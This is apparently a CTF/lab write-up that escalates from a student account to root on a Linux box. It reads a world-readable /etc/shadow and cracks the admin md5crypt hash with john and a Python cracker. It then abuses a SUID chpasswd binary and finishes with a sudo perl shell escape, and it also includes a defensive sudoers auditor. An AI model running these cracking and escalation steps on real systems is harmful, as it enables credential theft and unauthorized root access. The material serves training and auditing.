Multi User Escalation III | linux-privilege-escalation | Level: Easy
The Challenge
So you’ve got a foothold on a regular user account on a Linux box and tried to escalate privileges to root, but nothing seems to work? Keep in mind that many times you first have to escalate to another non-root user who holds some extra privilege on the system, and only then to root! Sometimes the user is the weakest link in the security chain! All required tools are available on the lab system.
Your mission is to get a root shell on the box!
Challenge Accepted
First ls -la in our home directory shows nothing interesting, so let’s try ls -la /. We see /wordlist, and inside it a gzipped rockyou.txt. After gunzipping it we know we will have to brute-force something. One of the first guesses is the shadow file: if we can read it, that is the target.
student@attackdefense:/wordlist$ ls /wordlist/
mypasswd rockyou.txt
student@attackdefense:/wordlist$ cat /etc/shadow
root:*:17764:0:99999:7:::
daemon:*:17764:0:99999:7:::
bin:*:17764:0:99999:7:::
sys:*:17764:0:99999:7:::
sync:*:17764:0:99999:7:::
games:*:17764:0:99999:7:::
man:*:17764:0:99999:7:::
lp:*:17764:0:99999:7:::
mail:*:17764:0:99999:7:::
news:*:17764:0:99999:7:::
uucp:*:17764:0:99999:7:::
proxy:*:17764:0:99999:7:::
www-data:*:17764:0:99999:7:::
backup:*:17764:0:99999:7:::
list:*:17764:0:99999:7:::
irc:*:17764:0:99999:7:::
gnats:*:17764:0:99999:7:::
nobody:*:17764:0:99999:7:::
_apt:*:17764:0:99999:7:::
student:!:17800::::::
admin:$1$B86AnBa6$JkxAjd1kSxBIW/4FeNy191:17800::::::
teacher:!:17800::::::
We can read /etc/shadow as an unprivileged user, which is the misconfiguration here: it should be mode 0640 and owned by root:shadow. Only admin carries a real hash; the $1$ prefix marks it as md5crypt, a scheme with a fixed 1000 MD5 rounds and no memory cost, so a wordlist attack is cheap. student and teacher show "!", meaning no usable password is set for them. unshadow, which ships with John the Ripper, merges /etc/passwd and /etc/shadow into the format John expects:
student@attackdefense:/wordlist$ unshadow /etc/passwd /etc/shadow > crackthis
Now run john with rockyou.txt as the wordlist and crackthis as the hash file. Note that --show does not crack anything; it only prints what john has already cracked and stored in its pot file, so cracking and showing are two separate runs:
student@attackdefense:/wordlist$ john --wordlist=rockyou.txt crackthis
student@attackdefense:/wordlist$ john --show crackthis
It worked, now we have the admin password!
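To make clear what john is actually doing against that hash, here is an added example (not code from the writeup and not John the Ripper's code): a pure-Python md5crypt as specified by the original FreeBSD crypt(3) scheme, plus a dictionary attack over unshadow-style lines. The sample lines and the short wordlist are constructed; the admin line reuses the hash shown above with made-up numeric fields, and the "svc" account, its salt and its password are inventions so the run has a guaranteed hit.

```python
import hashlib
import re

# md5crypt ("$1$") as implemented in FreeBSD/glibc crypt(3): salt of up to
# 8 chars, an initial digest, then 1000 rounds of MD5. That fixed, tiny
# work factor is why a leaked md5crypt hash falls to a wordlist in seconds.
ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"


def _to64(value, n):
    """crypt(3)'s custom base64: n chars, least significant 6 bits first."""
    out = bytearray()
    for _ in range(n):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password, salt):
    """Return "$1$<salt>$<22 chars>" for bytes password and bytes salt."""
    salt = salt[:8]
    ctx = hashlib.md5(password + MAGIC + salt)
    alt = hashlib.md5(password + salt + password).digest()
    n = len(password)
    while n > 0:
        ctx.update(alt[:min(n, 16)])
        n -= 16
    n = len(password)
    while n:
        ctx.update(b"\0" if n & 1 else password[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):  # the whole work factor of the scheme
        c = hashlib.md5()
        c.update(password if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(password)
        c.update(final if i & 1 else password)
        final = c.digest()
    f = final
    encoded = b"".join([
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4),
        _to64((f[1] << 16) | (f[7] << 8) | f[13], 4),
        _to64((f[2] << 16) | (f[8] << 8) | f[14], 4),
        _to64((f[3] << 16) | (f[9] << 8) | f[15], 4),
        _to64((f[4] << 16) | (f[10] << 8) | f[5], 4),
        _to64(f[11], 2),
    ])
    return (MAGIC + salt + b"$" + encoded).decode("ascii")


# Only entries with a real $1$ hash are worth attacking: "*" and "!" are
# locked accounts and "x" means the hash was never merged in from shadow.
HASH_RE = re.compile(r"^\$1\$([^$]{1,8})\$[./0-9A-Za-z]{22}$")


def parse_unshadow(lines):
    """Yield (user, hash, salt) for crackable md5crypt entries in unshadow output."""
    for line in lines:
        fields = line.rstrip("\n").split(":")
        if len(fields) < 2:
            continue
        m = HASH_RE.match(fields[1])
        if m:
            yield fields[0], fields[1], m.group(1).encode("ascii")


def crack(lines, words):
    """Dictionary attack; returns {user: password} for every hash that falls."""
    found = {}
    for user, h, salt in parse_unshadow(lines):
        for w in words:
            # rockyou.txt contains non-UTF-8 lines: read it as latin-1 and
            # encode the same way so every candidate round-trips byte for byte.
            if md5crypt(w.encode("latin-1"), salt) == h:
                found[user] = w
                break
    return found


# Constructed sample. The admin line reuses the hash from the writeup (its
# numeric fields are made up); "svc" is an invented account whose hash is
# generated here so the attack has a guaranteed hit to demonstrate.
SAMPLE_UNSHADOW = [
    "root:*:0:0:root:/root:/bin/bash",
    "student:!:1000:1000::/home/student:/bin/bash",
    "admin:$1$B86AnBa6$JkxAjd1kSxBIW/4FeNy191:1001:1001::/home/admin:/bin/bash",
    "svc:" + md5crypt(b"letmein", b"xyzsalt1") + ":1002:1002::/home/svc:/bin/bash",
]
SAMPLE_WORDLIST = ["123456", "password", "rockyou", "letmein", "iloveyou"]

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:  # usage: script.py crackthis rockyou.txt
        with open(sys.argv[1]) as hf, open(sys.argv[2], encoding="latin-1") as wf:
            print(crack(hf, [w.rstrip("\n") for w in wf]))
    else:
        print(crack(SAMPLE_UNSHADOW, SAMPLE_WORDLIST))
```

Each candidate costs roughly a thousand MD5 calls, so even this unoptimised Python gets through the 14 million lines of rockyou.txt in hours, and john or hashcat do it in minutes; the only real defence is a modern hash (yescrypt or sha512crypt with high rounds) behind an unreadable /etc/shadow.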
student@attackdefense:/wordlist$ su admin
Password:
admin@attackdefense:/wordlist$ whoami
admin
Now we’re in, let’s look around. .sudo_as_admin_successful stands out (Ubuntu drops it once a member of the admin group has used sudo successfully), but so does a SUID binary called chpasswd owned by root, sitting in admin’s home directory rather than in /usr/sbin. Let’s try that.
admin@attackdefense:~$ ls -la
total 28
drwxr-x--- 1 admin admin 4096 Mar 28 10:24 .
drwxr-xr-x 1 root root 4096 Sep 26 2018 ..
-rw------- 1 admin admin 17 Mar 28 10:30 .bash_history
-rw-r--r-- 1 root root 0 Sep 26 2018 .sudo_as_admin_successful
-rwsr-xr-x 1 root root 8568 Sep 26 2018 chpasswd
admin@attackdefense:~$ ./chpasswd root
Invalid User!
It was worth a try, right? Let’s see if we can find valid usernames…
admin@attackdefense:~$ strings chpasswd | grep "Invalid User" -A ...
student
teacher
admin
...
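What strings | grep -A is doing here, as an added example (not code from the writeup and not the lab's binary): the same printable-run rule as strings(1), a grep -A style context window, and a filter that keeps only identifier-shaped strings near the error message, which is how a hardcoded allowlist in a SUID binary gets recovered. The byte blob is a constructed stand-in for the binary, with the error message followed by the three names exactly as the lab output shows; everything else in it is filler.

```python
import re

# Constructed stand-in for the SUID binary: an ELF-ish header, opaque junk,
# two fragments too short to count as strings, and a .rodata-style run where
# the error message is directly followed by the hardcoded user allowlist.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + bytes(9)
    + bytes([0x00, 0x01, 0xFF, 0x80, 0x7F, 0x10, 0xC3, 0x90]) * 8
    + b"ab\0" + b"x=\0"
    + b"/lib64/ld-linux-x86-64.so.2\0"
    + b"Invalid User!\0student\0teacher\0admin\0"
    + bytes([0xE8, 0x00, 0x00, 0x00, 0x00, 0xC3]) * 4
)


def strings(blob, minlen=4):
    """Same rule as strings(1): runs of at least minlen printable ASCII bytes."""
    pattern = rb"[\t\x20-\x7e]{%d,}" % minlen
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def grep_after(strs, needle, after):
    """grep -A: the first string containing needle plus the `after` strings following it."""
    for i, s in enumerate(strs):
        if needle in s:
            return strs[i:i + after + 1]
    return []


# Unix usernames: lowercase, start with a letter or underscore, up to 32 chars.
IDENT_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def candidate_users(strs, needle="Invalid User", window=8):
    """Identifier-shaped strings right after the error: the likely allowlist."""
    hit = grep_after(strs, needle, window)
    return [s for s in hit[1:] if IDENT_RE.match(s)]


if __name__ == "__main__":
    found = strings(SAMPLE_BINARY)
    print(grep_after(found, "Invalid User", 3))
    print(candidate_users(found))
```

Two caveats a practitioner should keep in mind: strings(1) defaults to a minimum length of 4, so a two-letter username would be missed unless you pass -n 2, and a binary that compares against hashes or reads its list from a file would show no names at all, in which case ltrace on the failing run is the next step.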
Great, the binary carries a hardcoded list of valid users. We have already been student and admin, and teacher has no password set in /etc/shadow, so let’s give teacher one…
admin@attackdefense:~$ ./chpasswd teacher
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
admin@attackdefense:~$ su teacher
Password:
It worked. First things first: sudo -l.
teacher@attackdefense:/home/admin$ sudo -l
User teacher may run the following commands on attackdefense:
(root) NOPASSWD: /usr/bin/perl
Awesome: teacher can run perl as root without a password, and perl can exec a shell:
teacher@attackdefense:/home/admin$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
# id
uid=0(root) gid=0(root) groups=0(root)
Game Over.
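The sudo rule that ended this box is the kind of thing an audit should catch before an attacker does. As an added example (not code from the writeup or from sudo), here is a small sudoers checker: it parses simple user specs, ignores rules that do not run as root, and flags ALL, wildcard arguments, and interpreters or tools that can spawn a shell. The SHELL_ESCAPES list is an assumed, abbreviated one (GTFOBins is the full catalogue); the sample sudoers text is constructed, and only the teacher line reproduces what sudo -l printed in the lab.

```python
import re

# Assumed, abbreviated list of programs that hand you a shell or arbitrary
# code execution when run as root (the GTFOBins catalogue is the full one).
SHELL_ESCAPES = {
    "perl", "python", "python2", "python3", "ruby", "php", "node", "lua",
    "awk", "gawk", "find", "env", "sh", "bash", "dash", "zsh", "vi", "vim",
    "less", "more", "man", "nmap", "tar", "zip", "git", "make", "nano",
}

SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias",
                 "Runas_Alias", "@include")

# who  host=(runas[:group]) [TAG: ...] cmd1, cmd2   (no aliases, no \ continuations)
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Yield (who, runas_user, tags, [commands]) for each simple user spec."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        yield m.group("who"), runas, tags, cmds


def audit(text):
    """Return (who, command, reason) for every rule a local user could turn into root."""
    findings = []
    for who, runas, tags, cmds in parse_sudoers(text):
        if runas not in ("root", "ALL"):
            continue  # only rules that run as root matter for this check
        for cmd in cmds:
            reasons = []
            if cmd == "ALL":
                reasons.append("unrestricted root")
            else:
                prog = cmd.split()[0].rsplit("/", 1)[-1]
                if prog in SHELL_ESCAPES:
                    reasons.append(f"{prog} can spawn a root shell")
                if "*" in cmd:
                    reasons.append("wildcard argument")
            if reasons:
                if "NOPASSWD" in tags:
                    reasons.insert(0, "NOPASSWD")
                findings.append((who, cmd, "; ".join(reasons)))
    return findings


# Constructed sample. Only the teacher line reproduces what sudo -l showed in
# the lab; the other rules are made up to exercise the remaining checks.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
teacher ALL=(root) NOPASSWD: /usr/bin/perl
backup  ALL=(root) /bin/cat /var/log/auth.log
ops     ALL=(root) NOPASSWD: /bin/tar -czf /backups/*.tgz /srv
www     ALL=(www-data) NOPASSWD: /usr/bin/python3   # not root, skipped here
"""

if __name__ == "__main__":
    for who, cmd, why in audit(SAMPLE_SUDOERS):
        print(f"{who:8} {cmd:45} {why}")
```

The fix for the lab's rule is not a longer argument list on the same line (sudo argument matching is easily bypassed for interpreters) but a wrapper script owned by root, not writable by the user, that runs the one perl program teacher actually needs, with that script as the only command in sudoers.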